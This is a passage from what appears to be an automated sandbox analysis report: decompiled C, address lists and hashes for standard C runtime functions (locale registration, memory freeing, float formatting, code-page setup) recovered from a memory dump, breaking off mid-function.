0x001a0188
0x001a0191
0x001a0198
0x001a019e
0x001a019f
0x001950a1
0x001950a1
0x001950a1
0x001950a4
0x001950a4
0x001950a7
0x001950aa
0x001950aa
0x0019509f
0x0019501d
0x00000000
0x0019501d
0x00194fce
0x00194fce
0x00194fd1
0x00194fdd
0x00194fdf
0x00194fe2
0x00194fe6
0x00194fe9
0x00194fec
0x00194ff2
0x00194ff4
0x00194ff6
0x00194ff9
0x00194ffc
0x00194ffe
0x00195025
0x00195030
0x00195033
0x00195036
0x00195039
0x00195039
0x0019503b
0x0019503c
0x0019503d
0x00195000
0x00195002
0x00195003
0x00195005
0x00195005
0x0019503e
0x00195043
0x00195046
0x00195046
0x00195046
0x0019504f
0x00195051
0x00195056
0x0019505e
0x0019505e
0x00194fcc
0x00194f4d
0x00194f4d
0x00194f56
0x00194f59
0x00194f5b
0x00194f5e
0x00000000
0x00194f5e
0x00194f38
0x00194f38
0x00000000
0x00194f38
0x00194f36
0x00194ebd
0x00194ebd
0x00194ec6
0x00194ec9
0x00194ecb
0x00194ece
0x00000000
0x00194ece
0x00194ea8
0x00194ea8
0x00000000
0x00194ea8
0x00194ea6

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 00194E7E

Part of subcall function 0019178E: std::_Lockit::_Lockit.LIBCPMT ref: 001917AA
Part of subcall function 0019178E: std::_Lockit::~_Lockit.LIBCPMT ref: 001917C6

std::_Facet_Register.LIBCPMT ref: 00194EC1
std::_Lockit::~_Lockit.LIBCPMT ref: 00194ED7
Concurrency::cancel_current_task.LIBCPMT ref: 00194EED

Memory Dump Source

Source File: 00000001.00000002.279331771.0000000000191000.00000020.00000001.01000000.00000008.sdmp, Offset: 00190000, based on PE: true

Associated: 00000001.00000002.279317904.0000000000190000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.279360920.00000000001B4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.279375069.00000000001C3000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.279424896.00000000001EF000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.279438356.00000000001F0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.279552010.00000000001F2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_190000_123.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
String ID:
API String ID: 2081738530-0
Opcode ID: 4c754fbd50e5800e2d650f8e380094e8aa896baa524e16573c273cf42c0ce7bf
Instruction ID: d025bad0ecf4061cfc5dbc850da60c8ba4be973a65a2807b66030e823874462c
Opcode Fuzzy Hash: 4c754fbd50e5800e2d650f8e380094e8aa896baa524e16573c273cf42c0ce7bf
Instruction Fuzzy Hash: 1B01F536E00118BBCF15EFA8D981CAEB7B8BFA5720B100158F521A7281DF34AE45C750

Uniqueness

Uniqueness Score: -1.00%

Function 001A0475 Relevance: 4.6, APIs: 3, Instructions: 141
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 76%

			E001A0475(void* __ebx, signed int __ecx, void* __edx, void* __edi, void* __esi, intOrPtr _a4) {
				intOrPtr _v0;
				char _v8;
				char _v12;
				signed int _v16;
				char _v20;
				signed int _v44;
				char _v80;
				char _v84;
				void* _v93;
				char _v100;
				char _v104;
				char* _v108;
				char _v112;
				void* __ebp;
				intOrPtr* _t70;
				signed int _t71;
				char _t72;
				void* _t75;
				signed int _t80;
				signed int _t84;
				signed int _t95;
				signed int _t106;
				signed int _t110;
				void* _t111;
				char _t116;
				void* _t120;
				signed int _t125;
				signed int _t126;
				void* _t129;
				signed int _t131;
				signed int _t133;
				signed int _t143;
				void* _t145;
				char _t155;
				intOrPtr* _t157;
				intOrPtr _t159;
				void* _t160;
				signed int _t163;
				void* _t167;
				void* _t169;
				void* _t170;
				void* _t171;

				_t153 = __edx;
				_push(__ebx);
				_push(__esi);
				_t163 = __ecx;
				_push(__edi);
				_push( *((intOrPtr*)( *((intOrPtr*)(__ecx + 4)))));
				_t70 =  *((intOrPtr*)(__ecx));
				_push( *_t70); // executed
				L21(); // executed
				_t157 = _t70;
				_pop(_t129);
				if(_t157 == 0) {
					L4:
					_t71 = 0;
					goto L5;
				} else {
					_t72 = E001A5D71(_t129, __edx);
					_v12 = _t72;
					_t125 = 0;
					_v20 =  *((intOrPtr*)(_t72 + 0x4c));
					_t131 =  *(_t72 + 0x48);
					_v16 = _t131;
					_v8 = 0;
					_t75 = E001A8CAA(0, _t131, __edx,  &_v8, 0, 0, _t157, 0,  &_v20);
					_t170 = _t169 + 0x18;
					if(_t75 == 0) {
						_t126 = E001A871A(_v8 + 4);
						__eflags = _t126;
						if(_t126 == 0) {
							goto L4;
						} else {
							_t131 =  &_v20;
							_t13 = _t126 + 4; // 0x4
							_t80 = E001A8CAA(_t126, _t131, __edx, 0, _t13, _v8, _t157, 0xffffffff, _t131);
							_t170 = _t170 + 0x18;
							__eflags = _t80;
							if(_t80 == 0) {
								_t133 = _t131 | 0xffffffff;
								_t159 = _v20;
								_t16 = ( *((intOrPtr*)( *_t163)) +  *((intOrPtr*)( *_t163))) * 8; // 0x51d4e8
								__eflags =  *(_t159 + _t16 + 0x24);
								if(__eflags != 0) {
									asm("lock xadd [edx], eax");
									if(__eflags == 0) {
										_t19 = ( *((intOrPtr*)( *_t163)) +  *((intOrPtr*)( *_t163))) * 8; // 0x51d4e8
										E001A71B2( *((intOrPtr*)(_t159 + _t19 + 0x24)));
										_pop(_t143);
										 *(_t159 + 0x24 + ( *((intOrPtr*)( *_t163)) +  *((intOrPtr*)( *_t163))) * 8) =  *(_t159 + 0x24 + ( *((intOrPtr*)( *_t163)) +  *((intOrPtr*)( *_t163))) * 8) & 0x00000000;
										_t133 = _t143 | 0xffffffff;
										__eflags = _t133;
									}
								}
								_t155 = _v12;
								_t84 =  *0x1c3280; // 0xfffffffe
								__eflags =  *(_t155 + 0x350) & _t84;
								if(( *(_t155 + 0x350) & _t84) == 0) {
									_t32 = ( *((intOrPtr*)( *_t163)) +  *((intOrPtr*)( *_t163))) * 8; // 0x51d4e8
									__eflags =  *(_t159 + _t32 + 0x24);
									if( *(_t159 + _t32 + 0x24) != 0) {
										asm("lock xadd [eax], ecx");
										__eflags = _t133 == 1;
										if(_t133 == 1) {
											_t35 = ( *((intOrPtr*)( *_t163)) +  *((intOrPtr*)( *_t163))) * 8; // 0x51d4e8
											E001A71B2( *((intOrPtr*)(_t159 + _t35 + 0x24)));
											_t95 =  *((intOrPtr*)( *_t163)) +  *((intOrPtr*)( *_t163));
											_t37 = _t159 + 0x24 + _t95 * 8;
											 *_t37 =  *(_t159 + 0x24 + _t95 * 8) & 0x00000000;
											__eflags =  *_t37;
										}
									}
								}
								_t43 = _t159 + 0xc; // 0xb80775c0
								_t44 = _t126 + 4; // 0x4
								_t71 = _t44;
								 *_t126 =  *_t43;
								 *(_t159 + 0x24 + ( *((intOrPtr*)( *_t163)) +  *((intOrPtr*)( *_t163))) * 8) = _t126;
								 *((intOrPtr*)(_t159 + 0x1c + ( *((intOrPtr*)( *_t163)) +  *((intOrPtr*)( *_t163))) * 8)) = _t71;
								L5:
								return _t71;
							} else {
								__eflags = _t80 - 0x16;
								if(_t80 == 0x16) {
									L19:
									_t125 = 0;
									__eflags = 0;
									goto L20;
								} else {
									__eflags = _t80 - 0x22;
									if(_t80 == 0x22) {
										goto L19;
									} else {
										E001A71B2(_t126);
										goto L4;
									}
								}
							}
						}
					} else {
						if(_t75 == 0x16 || _t75 == 0x22) {
							L20:
							_push(_t125);
							_push(_t125);
							_push(_t125);
							_push(_t125);
							_push(_t125);
							E001A016C();
							asm("int3");
							_t167 = _t170;
							_push(_t131);
							__eflags = _v44;
							if(_v44 != 0) {
								_push(_t163);
								_push(_t157);
								_t160 = 0;
								_t106 = E001A89EB( &_v12, 0, 0, _a4, 0x7fffffff);
								_t171 = _t170 + 0x14;
								__eflags = _t106;
								if(_t106 == 0) {
									L26:
									_t163 = E001A58A2(_v12, 2);
									_pop(_t145);
									__eflags = _t163;
									if(_t163 == 0) {
										L32:
										E001A71B2(_t163);
										return _t160;
									} else {
										_t110 = E001A89EB(_t160, _t163, _v12, _a4, 0xffffffff);
										_t171 = _t171 + 0x14;
										__eflags = _t110;
										if(_t110 == 0) {
											_t111 = E001A3E4F(_t125, _t145, _t153, _t160, _t163, _v0, _t163); // executed
											_t160 = _t111;
											goto L32;
										} else {
											__eflags = _t110 - 0x16;
											if(_t110 == 0x16) {
												goto L33;
											} else {
												__eflags = _t110 - 0x22;
												if(_t110 == 0x22) {
													goto L33;
												} else {
													goto L32;
												}
											}
										}
									}
								} else {
									__eflags = _t106 - 0x16;
									if(_t106 == 0x16) {
										L33:
										_push(_t160);
										_push(_t160);
										_push(_t160);
										_push(_t160);
										_push(_t160);
										E001A016C();
										asm("int3");
										_push(_t167);
										E001A8682();
										_v112 =  &_v84;
										_v108 =  &_v80;
										_t116 = 4;
										_v100 = _t116;
										_v104 = _t116;
										_push( &_v100);
										_push( &_v112);
										_push( &_v104); // executed
										_t120 = E001A041A(_t125, _t160, _t163, __eflags); // executed
										return _t120;
									} else {
										__eflags = _t106 - 0x22;
										if(_t106 == 0x22) {
											goto L33;
										} else {
											goto L26;
										}
									}
								}
							} else {
								return E001A3E4F(_t125, _t131, _t153, _t157, _t163, _v0, 0);
							}
						} else {
							goto L4;
						}
					}
				}
			}

0x001a0475
0x001a047d
0x001a047e
0x001a047f
0x001a0481
0x001a0485
0x001a0487
0x001a0489
0x001a048b
0x001a0490
0x001a0493
0x001a0496
0x001a04db
0x001a04db
0x00000000
0x001a0498
0x001a0498
0x001a049d
0x001a04a0
0x001a04a5
0x001a04a8
0x001a04b5
0x001a04ba
0x001a04bd
0x001a04c2
0x001a04c7
0x001a04ee
0x001a04f1
0x001a04f3
0x00000000
0x001a04f5
0x001a04f5
0x001a04ff
0x001a0505
0x001a050a
0x001a050d
0x001a050f
0x001a052e
0x001a0531
0x001a0538
0x001a053c
0x001a053e
0x001a0542
0x001a0546
0x001a054e
0x001a0552
0x001a0559
0x001a055e
0x001a0563
0x001a0563
0x001a0563
0x001a0546
0x001a0566
0x001a0569
0x001a056e
0x001a0574
0x001a057c
0x001a0580
0x001a0582
0x001a0584
0x001a0588
0x001a0589
0x001a0591
0x001a0595
0x001a059f
0x001a05a1
0x001a05a1
0x001a05a1
0x001a05a1
0x001a0589
0x001a0582
0x001a05a6
0x001a05a9
0x001a05a9
0x001a05ac
0x001a05b4
0x001a05be
0x001a04dd
0x001a04e1
0x001a0511
0x001a0511
0x001a0514
0x001a05c7
0x001a05c7
0x001a05c7
0x00000000
0x001a051a
0x001a051a
0x001a051d
0x00000000
0x001a0523
0x001a0524
0x00000000
0x001a0529
0x001a051d
0x001a0514
0x001a050f
0x001a04c9
0x001a04cc
0x001a05c9
0x001a05c9
0x001a05ca
0x001a05cb
0x001a05cc
0x001a05cd
0x001a05ce
0x001a05d3
0x001a05d7
0x001a05d9
0x001a05da
0x001a05de
0x001a05ee
0x001a05ef
0x001a05f8
0x001a0600
0x001a0605
0x001a0608
0x001a060a
0x001a0616
0x001a0620
0x001a0623
0x001a0624
0x001a0626
0x001a0657
0x001a0658
0x001a0663
0x001a0628
0x001a0632
0x001a0637
0x001a063a
0x001a063c
0x001a064e
0x001a0655
0x00000000
0x001a063e
0x001a063e
0x001a0641
0x00000000
0x001a0643
0x001a0643
0x001a0646
0x00000000
0x001a0648
0x00000000
0x001a0648
0x001a0646
0x001a0641
0x001a063c
0x001a060c
0x001a060c
0x001a060f
0x001a0664
0x001a0664
0x001a0665
0x001a0666
0x001a0667
0x001a0668
0x001a0669
0x001a066e
0x001a0671
0x001a0677
0x001a067f
0x001a068a
0x001a068d
0x001a068e
0x001a0691
0x001a0697
0x001a069b
0x001a069f
0x001a06a0
0x001a06a6
0x001a0611
0x001a0611
0x001a0614
0x00000000
0x00000000
0x00000000
0x00000000
0x001a0614
0x001a060f
0x001a05e0
0x001a05ed
0x001a05ed
0x00000000
0x00000000
0x00000000
0x001a04cc
0x001a04c7

APIs

Part of subcall function 001A5D71: GetLastError.KERNEL32(?,00000000,?,0019D1A2,00000000,00000000,?,?,001A8943,00000000,00000000,00000000,00000000,?), ref: 001A5D76
Part of subcall function 001A5D71: SetLastError.KERNEL32(00000000,00000002,000000FF,?,001A8943,00000000,00000000,00000000,00000000,?), ref: 001A5E14

_free.LIBCMT ref: 001A0524
_free.LIBCMT ref: 001A0552
_free.LIBCMT ref: 001A0595

Memory Dump Source

Source File: 00000001.00000002.279331771.0000000000191000.00000020.00000001.01000000.00000008.sdmp, Offset: 00190000, based on PE: true

Associated: 00000001.00000002.279317904.0000000000190000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.279360920.00000000001B4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.279375069.00000000001C3000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.279424896.00000000001EF000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.279438356.00000000001F0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.279552010.00000000001F2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_190000_123.jbxd

Yara matches

Similarity

API ID: _free$ErrorLast
String ID:
API String ID: 3291180501-0
Opcode ID: 549faac8499ba76590a37c2bd271c983671d19568e79fd6b244f2cf5cdf1f1af
Instruction ID: eb8f8978e1e4bf08ed0759ba2a78199ef715b06d74da3cac3d08a20a69a99aad
Opcode Fuzzy Hash: 549faac8499ba76590a37c2bd271c983671d19568e79fd6b244f2cf5cdf1f1af
Instruction Fuzzy Hash: 76414839600205AFDB29DFACCC85A6AB3E9FF4E310B24066DF545C7291EB31ED109B50

Uniqueness

Uniqueness Score: -1.00%

Function 001A05D4 Relevance: 4.6, APIs: 3, Instructions: 96
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 72%

			E001A05D4(void* __ebx, void* __ecx, void* __edi, void* __esi, intOrPtr _a4, intOrPtr _a8) {
				char _v8;
				char _v28;
				char _v32;
				void* _v41;
				char _v48;
				char _v52;
				char* _v56;
				char _v60;
				void* __ebp;
				void* _t20;
				void* _t24;
				void* _t25;
				char _t30;
				void* _t34;
				void* _t39;
				void* _t46;
				void* _t48;
				void* _t54;
				void* _t55;

				_t50 = __esi;
				_t36 = __ebx;
				_push(__ecx);
				if(_a8 != 0) {
					_push(__esi);
					_push(__edi);
					_t48 = 0;
					_t20 = E001A89EB( &_v8, 0, 0, _a8, 0x7fffffff);
					_t55 = _t54 + 0x14;
					__eflags = _t20;
					if(_t20 == 0) {
						L5:
						_t50 = E001A58A2(_v8, 2);
						_pop(_t39);
						__eflags = _t50;
						if(_t50 == 0) {
							L11:
							E001A71B2(_t50);
							return _t48;
						} else {
							_t24 = E001A89EB(_t48, _t50, _v8, _a8, 0xffffffff);
							_t55 = _t55 + 0x14;
							__eflags = _t24;
							if(_t24 == 0) {
								_t25 = E001A3E4F(_t36, _t39, _t46, _t48, _t50, _a4, _t50); // executed
								_t48 = _t25;
								goto L11;
							} else {
								__eflags = _t24 - 0x16;
								if(_t24 == 0x16) {
									goto L12;
								} else {
									__eflags = _t24 - 0x22;
									if(_t24 == 0x22) {
										goto L12;
									} else {
										goto L11;
									}
								}
							}
						}
					} else {
						__eflags = _t20 - 0x16;
						if(_t20 == 0x16) {
							L12:
							_push(_t48);
							_push(_t48);
							_push(_t48);
							_push(_t48);
							_push(_t48);
							E001A016C();
							asm("int3");
							E001A8682();
							_v60 =  &_v32;
							_v56 =  &_v28;
							_t30 = 4;
							_v48 = _t30;
							_v52 = _t30;
							_push( &_v48);
							_push( &_v60);
							_push( &_v52); // executed
							_t34 = E001A041A(_t36, _t48, _t50, __eflags); // executed
							return _t34;
						} else {
							__eflags = _t20 - 0x22;
							if(_t20 == 0x22) {
								goto L12;
							} else {
								goto L5;
							}
						}
					}
				} else {
					return E001A3E4F(__ebx, __ecx, _t46, __edi, __esi, _a4, 0);
				}
			}

0x001a05d4
0x001a05d4
0x001a05d9
0x001a05de
0x001a05ee
0x001a05ef
0x001a05f8
0x001a0600
0x001a0605
0x001a0608
0x001a060a
0x001a0616
0x001a0620
0x001a0623
0x001a0624
0x001a0626
0x001a0657
0x001a0658
0x001a0663
0x001a0628
0x001a0632
0x001a0637
0x001a063a
0x001a063c
0x001a064e
0x001a0655
0x00000000
0x001a063e
0x001a063e
0x001a0641
0x00000000
0x001a0643
0x001a0643
0x001a0646
0x00000000
0x001a0648
0x00000000
0x001a0648
0x001a0646
0x001a0641
0x001a063c
0x001a060c
0x001a060c
0x001a060f
0x001a0664
0x001a0664
0x001a0665
0x001a0666
0x001a0667
0x001a0668
0x001a0669
0x001a066e
0x001a0677
0x001a067f
0x001a068a
0x001a068d
0x001a068e
0x001a0691
0x001a0697
0x001a069b
0x001a069f
0x001a06a0
0x001a06a6
0x001a0611
0x001a0611
0x001a0614
0x00000000
0x00000000
0x00000000
0x00000000
0x001a0614
0x001a060f
0x001a05e0
0x001a05ed
0x001a05ed

APIs

__cftoe.LIBCMT ref: 001A0600
__cftoe.LIBCMT ref: 001A0632
_free.LIBCMT ref: 001A0658

Memory Dump Source

Source File: 00000001.00000002.279331771.0000000000191000.00000020.00000001.01000000.00000008.sdmp, Offset: 00190000, based on PE: true

Associated: 00000001.00000002.279317904.0000000000190000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.279360920.00000000001B4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.279375069.00000000001C3000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.279424896.00000000001EF000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.279438356.00000000001F0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.279552010.00000000001F2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_190000_123.jbxd

Yara matches

Similarity

API ID: __cftoe$_free
String ID:
API String ID: 1303422935-0
Opcode ID: 19ffaf41f71fcc14494c5dd2a69315e07d9690aa0d8d29b8391ad6d17b9d068f
Instruction ID: 5da41561e34913a9fb694249e7a74fc6ccac8c9680d879a924d4d79bd1c8845c
Opcode Fuzzy Hash: 19ffaf41f71fcc14494c5dd2a69315e07d9690aa0d8d29b8391ad6d17b9d068f
Instruction Fuzzy Hash: 7D21FB7A8042087ACF26AB559C46DEF3BA9DFDB724F204127F919E5181EF31CB508661

Uniqueness

Uniqueness Score: -1.00%

Function 001ACF2D Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 126
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 96%

			E001ACF2D(signed int __edx, intOrPtr _a4) {
				signed int _v8;
				char _v264;
				char _v520;
				char _v776;
				char _v1800;
				char _v1814;
				struct _cpinfo _v1820;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t60;
				signed int _t63;
				char _t68;
				signed char _t69;
				signed int _t70;
				signed int _t80;
				signed int _t81;
				char _t82;
				signed int _t85;
				signed char _t86;
				signed int _t87;
				signed int _t88;
				void* _t89;
				intOrPtr _t90;
				signed int _t91;

				_t88 = __edx;
				_t60 =  *0x1c3014; // 0x88921fa2
				_v8 = _t60 ^ _t91;
				_t90 = _a4;
				if( *(_t90 + 4) == 0xfde9) {
					L19:
					_t81 = 0;
					__eflags = 0;
					_t89 = 0x100;
					_t82 = 0;
					do {
						_t46 = _t82 - 0x61; // -97
						_t88 = _t46;
						_t47 = _t88 + 0x20; // -65
						__eflags = _t47 - 0x19;
						if(_t47 > 0x19) {
							__eflags = _t88 - 0x19;
							if(_t88 > 0x19) {
								_t63 = _t81;
							} else {
								 *(_t90 + _t82 + 0x19) =  *(_t90 + _t82 + 0x19) | 0x00000020;
								_t56 = _t82 - 0x20; // -32
								_t63 = _t56;
							}
						} else {
							 *(_t90 + _t82 + 0x19) =  *(_t90 + _t82 + 0x19) | 0x00000010;
							_t52 = _t82 + 0x20; // 0x20
							_t63 = _t52;
						}
						 *(_t90 + _t82 + 0x119) = _t63;
						_t82 = _t82 + 1;
						__eflags = _t82 - _t89;
					} while (_t82 < _t89);
					L26:
					return E00197F14(_t63, _t81, _v8 ^ _t91, _t88, _t89, _t90);
				}
				_t5 = _t90 + 4; // 0xe8458d00
				if(GetCPInfo( *_t5,  &_v1820) == 0) {
					goto L19;
				} else {
					_t81 = 0;
					_t89 = 0x100;
					_t68 = 0;
					do {
						 *((char*)(_t91 + _t68 - 0x104)) = _t68;
						_t68 = _t68 + 1;
					} while (_t68 < 0x100);
					_t69 = _v1814;
					_t85 =  &_v1814;
					_v264 = 0x20;
					while(1) {
						_t99 = _t69;
						if(_t69 == 0) {
							break;
						}
						_t88 =  *(_t85 + 1) & 0x000000ff;
						_t70 = _t69 & 0x000000ff;
						while(1) {
							__eflags = _t70 - _t88;
							if(_t70 > _t88) {
								break;
							}
							__eflags = _t70 - _t89;
							if(_t70 >= _t89) {
								break;
							}
							 *((char*)(_t91 + _t70 - 0x104)) = 0x20;
							_t70 = _t70 + 1;
							__eflags = _t70;
						}
						_t85 = _t85 + 2;
						__eflags = _t85;
						_t69 =  *_t85;
					}
					_t14 = _t90 + 4; // 0xe8458d00
					E001AB3FB(_t99, _t81, 1,  &_v264, _t89,  &_v1800,  *_t14, _t81);
					_t17 = _t90 + 4; // 0xe8458d00
					_t20 = _t90 + 0x21c; // 0xffffffac
					E001A7F34(_t99, _t81,  *_t20, _t89,  &_v264, _t89,  &_v520, _t89,  *_t17, _t81); // executed
					_t22 = _t90 + 4; // 0xe8458d00
					_t24 = _t90 + 0x21c; // 0xffffffac
					E001A7F34(_t99, _t81,  *_t24, 0x200,  &_v264, _t89,  &_v776, _t89,  *_t22, _t81);
					_t80 = _t81;
					do {
						_t86 =  *(_t91 + _t80 * 2 - 0x704) & 0x0000ffff;
						if((_t86 & 0x00000001) == 0) {
							__eflags = _t86 & 0x00000002;
							if((_t86 & 0x00000002) == 0) {
								_t87 = _t81;
							} else {
								 *(_t90 + _t80 + 0x19) =  *(_t90 + _t80 + 0x19) | 0x00000020;
								_t87 =  *((intOrPtr*)(_t91 + _t80 - 0x304));
							}
						} else {
							 *(_t90 + _t80 + 0x19) =  *(_t90 + _t80 + 0x19) | 0x00000010;
							_t87 =  *((intOrPtr*)(_t91 + _t80 - 0x204));
						}
						 *(_t90 + _t80 + 0x119) = _t87;
						_t80 = _t80 + 1;
					} while (_t80 < _t89);
					goto L26;
				}
			}

0x001acf2d
0x001acf38
0x001acf3f
0x001acf44
0x001acf4f
0x001ad061
0x001ad061
0x001ad061
0x001ad063
0x001ad068
0x001ad06a
0x001ad06a
0x001ad06a
0x001ad06d
0x001ad070
0x001ad073
0x001ad07f
0x001ad082
0x001ad090
0x001ad084
0x001ad087
0x001ad08b
0x001ad08b
0x001ad08b
0x001ad075
0x001ad075
0x001ad07a
0x001ad07a
0x001ad07a
0x001ad092
0x001ad099
0x001ad09a
0x001ad09a
0x001ad09e
0x001ad0ac
0x001ad0ac
0x001acf5c
0x001acf67
0x00000000
0x001acf6d
0x001acf6d
0x001acf6f
0x001acf74
0x001acf76
0x001acf76
0x001acf7d
0x001acf7e
0x001acf82
0x001acf88
0x001acf8e
0x001acfb6
0x001acfb6
0x001acfb8
0x00000000
0x00000000
0x001acf97
0x001acf9b
0x001acfad
0x001acfad
0x001acfaf
0x00000000
0x00000000
0x001acfa0
0x001acfa2
0x00000000
0x00000000
0x001acfa4
0x001acfac
0x001acfac
0x001acfac
0x001acfb1
0x001acfb1
0x001acfb4
0x001acfb4
0x001acfbb
0x001acfd0
0x001acfd6
0x001acfea
0x001acff1
0x001ad000
0x001ad012
0x001ad019
0x001ad021
0x001ad023
0x001ad023
0x001ad02e
0x001ad03e
0x001ad041
0x001ad051
0x001ad043
0x001ad043
0x001ad048
0x001ad048
0x001ad030
0x001ad030
0x001ad035
0x001ad035
0x001ad053
0x001ad05a
0x001ad05b
0x00000000
0x001ad05f

APIs

GetCPInfo.KERNEL32(E8458D00,?,0000000C,00000000,00000000), ref: 001ACF5F

Strings

, xrefs: 001ACFA4

Memory Dump Source

Source File: 00000001.00000002.279331771.0000000000191000.00000020.00000001.01000000.00000008.sdmp, Offset: 00190000, based on PE: true

Associated: 00000001.00000002.279317904.0000000000190000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.279360920.00000000001B4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.279375069.00000000001C3000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.279424896.00000000001EF000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.279438356.00000000001F0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.279552010.00000000001F2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_190000_123.jbxd

Yara matches

Similarity

API ID: Info
String ID:
API String ID: 1807457897-3916222277
Opcode ID: e183445bb93239efcb9516662c3d7d3dc3c1f33e592028eb95bfdd9b54641f7b
Instruction ID: ebcd9a4188ca35035d075e27334be838ec377148ed7bec6f2f81587bbfdfe916
Opcode Fuzzy Hash: e183445bb93239efcb9516662c3d7d3dc3c1f33e592028eb95bfdd9b54641f7b
Instruction Fuzzy Hash: 884168785046489FDB258A28DE94BFABBFEEB16304F2444ACF5CBC7042D3709E459B60

Uniqueness

Uniqueness Score: -1.00%

Function 001AD2BC Relevance: 3.2, APIs: 2, Instructions: 166
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 92%

			E001AD2BC(void* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				char _v22;
				struct _cpinfo _v28;
				signed int _v32;
				signed int _v36;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t51;
				signed int _t55;
				int _t57;
				signed int _t60;
				signed int _t61;
				short _t64;
				signed char _t66;
				signed int _t67;
				signed char* _t75;
				signed char* _t76;
				int _t78;
				signed int _t83;
				signed char* _t84;
				short* _t85;
				signed int _t86;
				signed char _t87;
				signed int _t88;
				void* _t89;
				signed int _t90;
				signed int _t91;
				short _t92;
				signed int _t93;
				intOrPtr _t95;
				signed int _t96;

				_t89 = __edx;
				_t51 =  *0x1c3014; // 0x88921fa2
				_v8 = _t51 ^ _t96;
				_t95 = _a8;
				_t78 = E001ACE57(__eflags, _a4);
				if(_t78 == 0) {
					L36:
					E001ACEC8(_t95);
					goto L37;
				} else {
					_t92 = 0;
					_t83 = 0;
					_t57 = 0;
					_v32 = 0;
					while( *((intOrPtr*)(_t57 + 0x1c3880)) != _t78) {
						_t83 = _t83 + 1;
						_t57 = _t57 + 0x30;
						_v32 = _t83;
						if(_t57 < 0xf0) {
							continue;
						} else {
							if(_t78 == 0xfde8) {
								L22:
								_t55 = _t57 | 0xffffffff;
							} else {
								_t57 = IsValidCodePage(_t78 & 0x0000ffff);
								if(_t57 == 0) {
									goto L22;
								} else {
									if(_t78 != 0xfde9) {
										_t57 = GetCPInfo(_t78,  &_v28);
										__eflags = _t57;
										if(_t57 == 0) {
											__eflags =  *0x1f1118 - _t92;
											if( *0x1f1118 != _t92) {
												goto L36;
											} else {
												goto L22;
											}
										} else {
											_t14 = _t95 + 0x18; // 0x18
											E00199180(_t92, _t14, _t92, 0x101);
											 *(_t95 + 4) = _t78;
											__eflags = _v28 - 2;
											 *((intOrPtr*)(_t95 + 0x21c)) = _t92;
											if(_v28 == 2) {
												__eflags = _v22;
												_t75 =  &_v22;
												if(_v22 != 0) {
													while(1) {
														_t87 = _t75[1];
														__eflags = _t87;
														if(_t87 == 0) {
															goto L18;
														}
														_t90 = _t87 & 0x000000ff;
														_t88 =  *_t75 & 0x000000ff;
														while(1) {
															__eflags = _t88 - _t90;
															if(_t88 > _t90) {
																break;
															}
															 *(_t95 + _t88 + 0x19) =  *(_t95 + _t88 + 0x19) | 0x00000004;
															_t88 = _t88 + 1;
															__eflags = _t88;
														}
														_t75 =  &(_t75[2]);
														__eflags =  *_t75;
														if( *_t75 != 0) {
															continue;
														}
														goto L18;
													}
												}
												L18:
												_t25 = _t95 + 0x1a; // 0x1a
												_t76 = _t25;
												_t86 = 0xfe;
												do {
													 *_t76 =  *_t76 | 0x00000008;
													_t76 =  &(_t76[1]);
													_t86 = _t86 - 1;
													__eflags = _t86;
												} while (_t86 != 0);
												 *((intOrPtr*)(_t95 + 0x21c)) = E001ACE19( *(_t95 + 4));
												_t92 = 1;
											}
											goto L8;
										}
									} else {
										 *(_t95 + 4) = 0xfde9;
										 *((intOrPtr*)(_t95 + 0x21c)) = _t92;
										 *((intOrPtr*)(_t95 + 0x18)) = _t92;
										 *((short*)(_t95 + 0x1c)) = _t92;
										L8:
										 *((intOrPtr*)(_t95 + 8)) = _t92;
										_t12 = _t95 + 0xc; // 0xc
										_t92 = _t12;
										asm("stosd");
										asm("stosd");
										asm("stosd");
										L9:
										E001ACF2D(_t90, _t95); // executed
										L37:
										_t55 = 0;
									}
								}
							}
						}
						goto L38;
					}
					_t28 = _t95 + 0x18; // 0x18
					E00199180(_t92, _t28, _t92, 0x101);
					_t60 = _v32 * 0x30;
					__eflags = _t60;
					_v36 = _t60;
